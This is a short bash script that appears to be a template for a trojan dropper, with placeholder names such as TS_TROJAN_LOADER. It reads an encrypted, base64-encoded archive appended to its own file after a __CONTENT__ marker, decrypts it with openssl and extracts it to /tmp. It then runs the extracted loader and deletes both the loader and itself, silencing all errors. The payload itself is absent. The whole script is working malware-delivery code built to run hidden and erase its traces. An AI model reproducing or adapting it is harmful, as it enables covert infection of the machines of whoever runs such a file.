#!/bin/bash -p

CONTENT=`awk '/__CONTENT__/ { if (NR > 3) print NR+1 }' $0 2>/dev/null | tail -n1 2>/dev/null`

tail -n+$CONTENT $0 2>/dev/null | openssl enc -d -aes-256-cbc -a -salt 2>/dev/null | base64 -di 2>/dev/null | tar -zxf - -C /tmp/ 2>/dev/null && chmod +x /tmp/#!TS_TROJAN_LOADER!#/#!TS_TROJAN_LOADER!# 2>/dev/null && /tmp/#!TS_TROJAN_LOADER!#/#!TS_TROJAN_LOADER!# 2>/dev/null
#!TS_TROJAN_PATH!#/bin/rm -Rf /tmp/#!TS_TROJAN_LOADER!# 2>/dev/null
#!TS_TROJAN_PATH!#/bin/rm -Rf $0 2>/dev/null
exit

__CONTENT__
